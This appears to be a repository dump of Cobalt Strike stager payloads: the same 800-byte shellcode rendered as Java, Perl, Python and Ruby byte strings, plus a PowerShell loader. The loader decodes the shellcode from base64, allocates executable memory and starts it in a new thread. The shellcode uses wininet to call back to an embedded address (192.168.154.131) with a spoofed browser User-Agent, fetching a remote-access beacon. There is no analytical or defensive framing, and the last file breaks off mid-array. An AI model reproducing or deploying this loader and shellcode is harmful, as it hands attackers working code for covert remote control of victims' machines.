0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x35, 0x34, 0x2e, 0x31, 0x33, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00 };


================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.java
================================================
/* length: 800 bytes */
byte buf[] = new byte[] { 0xfc, 0xe8, 0x89, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xd2, 0x64, 0x8b, 0x52, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0xe2, 0xf0, 0x52, 0x57, 0x8b, 0x52, 0x10, 0x8b, 0x42, 0x3c, 0x01, 0xd0, 0x8b, 0x40, 0x78, 0x85, 0xc0, 0x74, 0x4a, 0x01, 0xd0, 0x50, 0x8b, 0x48, 0x18, 0x8b, 0x58, 0x20, 0x01, 0xd3, 0xe3, 0x3c, 0x49, 0x8b, 0x34, 0x8b, 0x01, 0xd6, 0x31, 0xff, 0x31, 0xc0, 0xac, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 0x38, 0xe0, 0x75, 0xf4, 0x03, 0x7d, 0xf8, 0x3b, 0x7d, 0x24, 0x75, 0xe2, 0x58, 0x8b, 0x58, 0x24, 0x01, 0xd3, 0x66, 0x8b, 0x0c, 0x4b, 0x8b, 0x58, 0x1c, 0x01, 0xd3, 0x8b, 0x04, 0x8b, 0x01, 0xd0, 0x89, 0x44, 0x24, 0x24, 0x5b, 0x5b, 0x61, 0x59, 0x5a, 0x51, 0xff, 0xe0, 0x58, 0x5f, 0x5a, 0x8b, 0x12, 0xeb, 0x86, 0x5d, 0x68, 0x6e, 0x65, 0x74, 0x00, 0x68, 0x77, 0x69, 0x6e, 0x69, 0x54, 0x68, 0x4c, 0x77, 0x26, 0x07, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x57, 0x57, 0x57, 0x57, 0x68, 0x3a, 0x56, 0x79, 0xa7, 0xff, 0xd5, 0xe9, 0x84, 0x00, 0x00, 0x00, 0x5b, 0x31, 0xc9, 0x51, 0x51, 0x6a, 0x03, 0x51, 0x51, 0x68, 0x24, 0x05, 0x00, 0x00, 0x53, 0x50, 0x68, 0x57, 0x89, 0x9f, 0xc6, 0xff, 0xd5, 0xeb, 0x70, 0x5b, 0x31, 0xd2, 0x52, 0x68, 0x00, 0x02, 0x60, 0x84, 0x52, 0x52, 0x52, 0x53, 0x52, 0x50, 0x68, 0xeb, 0x55, 0x2e, 0x3b, 0xff, 0xd5, 0x89, 0xc6, 0x83, 0xc3, 0x50, 0x31, 0xff, 0x57, 0x57, 0x6a, 0xff, 0x53, 0x56, 0x68, 0x2d, 0x06, 0x18, 0x7b, 0xff, 0xd5, 0x85, 0xc0, 0x0f, 0x84, 0xc3, 0x01, 0x00, 0x00, 0x31, 0xff, 0x85, 0xf6, 0x74, 0x04, 0x89, 0xf9, 0xeb, 0x09, 0x68, 0xaa, 0xc5, 0xe2, 0x5d, 0xff, 0xd5, 0x89, 0xc1, 0x68, 0x45, 0x21, 0x5e, 0x31, 0xff, 0xd5, 0x31, 0xff, 0x57, 0x6a, 0x07, 0x51, 0x56, 0x50, 0x68, 0xb7, 0x57, 0xe0, 0x0b, 0xff, 0xd5, 0xbf, 0x00, 0x2f, 0x00, 0x00, 0x39, 0xc7, 0x74, 0xb7, 0x31, 0xff, 0xe9, 0x91, 0x01, 0x00, 0x00, 0xe9, 0xc9, 0x01, 0x00, 0x00, 0xe8, 0x8b, 0xff, 0xff, 0xff, 0x2f, 0x6a, 0x48, 0x75, 0x35, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x00, 0x55, 0x73, 0x65, 0x72, 0x2d, 0x41, 0x67, 0x65, 0x6e, 0x74, 0x3a, 0x20, 0x4d, 0x6f, 0x7a, 0x69, 0x6c, 0x6c, 0x61, 0x2f, 0x35, 0x2e, 0x30, 0x20, 0x28, 0x63, 0x6f, 0x6d, 0x70, 0x61, 0x74, 0x69, 0x62, 0x6c, 0x65, 0x3b, 0x20, 0x4d, 0x53, 0x49, 0x45, 0x20, 0x31, 0x30, 0x2e, 0x30, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x64, 0x6f, 0x77, 0x73, 0x20, 0x4e, 0x54, 0x20, 0x36, 0x2e, 0x32, 0x3b, 0x20, 0x57, 0x69, 0x6e, 0x36, 0x34, 0x3b, 0x20, 0x78, 0x36, 0x34, 0x3b, 0x20, 0x54, 0x72, 0x69, 0x64, 0x65, 0x6e, 0x74, 0x2f, 0x36, 0x2e, 0x30, 0x29, 0x0d, 0x0a, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x69, 0x64, 0x75, 0x2e, 0x63, 0x6f, 0x6d, 0x00, 0x62, 0x61, 0x00, 0x68, 0xf0, 0xb5, 0xa2, 0x56, 0xff, 0xd5, 0x6a, 0x40, 0x68, 0x00, 0x10, 0x00, 0x00, 0x68, 0x00, 0x00, 0x40, 0x00, 0x57, 0x68, 0x58, 0xa4, 0x53, 0xe5, 0xff, 0xd5, 0x93, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x01, 0xd9, 0x51, 0x53, 0x89, 0xe7, 0x57, 0x68, 0x00, 0x20, 0x00, 0x00, 0x53, 0x56, 0x68, 0x12, 0x96, 0x89, 0xe2, 0xff, 0xd5, 0x85, 0xc0, 0x74, 0xc6, 0x8b, 0x07, 0x01, 0xc3, 0x85, 0xc0, 0x75, 0xe5, 0x58, 0xc3, 0xe8, 0xa9, 0xfd, 0xff, 0xff, 0x31, 0x39, 0x32, 0x2e, 0x31, 0x36, 0x38, 0x2e, 0x31, 0x35, 0x34, 0x2e, 0x31, 0x33, 0x31, 0x00, 0x00, 0x00, 0x00, 0x00 };


================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.pl
================================================
# length: 800 bytes
$buf = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x24\x05\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x60\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x43\x77\x6d\x35\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x34\x2e\x31\x33\x31\x00\x00\x00\x00\x00";


================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.ps1
================================================
Set-StrictMode -Version 2

$eicar = 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'

$DoIt = @'
$assembly = @"
	using System;
	using System.Runtime.InteropServices;
	namespace inject {
		public class func {
			[Flags] public enum AllocationType { Commit = 0x1000, Reserve = 0x2000 }
			[Flags] public enum MemoryProtection { ExecuteReadWrite = 0x40 }
			[Flags] public enum Time : uint { Infinite = 0xFFFFFFFF }
			[DllImport("kernel32.dll")] public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
			[DllImport("kernel32.dll")] public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
			[DllImport("kernel32.dll")] public static extern int WaitForSingleObject(IntPtr hHandle, Time dwMilliseconds);
		}
	}
"@

$compiler = New-Object Microsoft.CSharp.CSharpCodeProvider
$params = New-Object System.CodeDom.Compiler.CompilerParameters
$params.ReferencedAssemblies.AddRange(@("System.dll", [PsObject].Assembly.Location))
$params.GenerateInMemory = $True
$result = $compiler.CompileAssemblyFromSource($params, $assembly)

[Byte[]]$var_code = [System.Convert]::FromBase64String("/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//VMf9XV1dXV2g6Vnmn/9XphAAAAFsxyVFRagNRUWgkBQAAU1BoV4mfxv/V63BbMdJSaAACYIRSUlJTUlBo61UuO//VicaDw1Ax/1dXav9TVmgtBhh7/9WFwA+EwwEAADH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9XagdRVlBot1fgC//VvwAvAAA5x3S3Mf/pkQEAAOnJAQAA6Iv///8vZjhYZgBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpAFVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDEwLjA7IFdpbmRvd3MgTlQgNi4yOyBXaW42NDsgeDY0OyBUcmlkZW50LzYuMCkNCgBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYWlkdS5jb20AYmFpZHUuY29tAGJhaWR1LmNvbQBiYQBo8LWiVv/VakBoABAAAGgAAEAAV2hYpFPl/9WTuQAAAAAB2VFTiedXaAAgAABTVmgSloni/9WFwHTGiwcBw4XAdeVYw+ip/f//MTkyLjE2OC4xNTQuMTMxAAAAAAA=")

$buffer = [inject.func]::VirtualAlloc(0, $var_code.Length + 1, [inject.func+AllocationType]::Reserve -bOr [inject.func+AllocationType]::Commit, [inject.func+MemoryProtection]::ExecuteReadWrite)
if ([Bool]!$buffer) { 
	$global:result = 3; 
	return 
}
[System.Runtime.InteropServices.Marshal]::Copy($var_code, 0, $buffer, $var_code.Length)
[IntPtr] $thread = [inject.func]::CreateThread(0, 0, $buffer, 0, 0, 0)
if ([Bool]!$thread) {
	$global:result = 7; 
	return 
}
$result2 = [inject.func]::WaitForSingleObject($thread, [inject.func+Time]::Infinite)
'@

If ([IntPtr]::size -eq 8) {
	start-job { param($a) IEX $a } -RunAs32 -Argument $DoIt | wait-job | Receive-Job
}
else {
	IEX $DoIt
}


================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.py
================================================
# length: 800 bytes
buf = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x24\x05\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x60\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x66\x77\x31\x4e\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x35\x34\x2e\x31\x33\x31\x00\x00\x00\x00\x00"


================================================
FILE: CobaltStrike_Trojanlinkage/CobaltStrike_Payload/payload.rb
================================================
# length: 800 bytes
buf = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x24\x05\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x60\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x75\x43\x50\x54\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x31\x30\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x32\x3b\x20\x57\x69\x6e\x36\x34\x3b\x20\x78\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x36\x2e\x30\x29\x0d\x0a\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x69\x64\x75\x2e\x63\x6f\x6d\x00\x62\x61\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9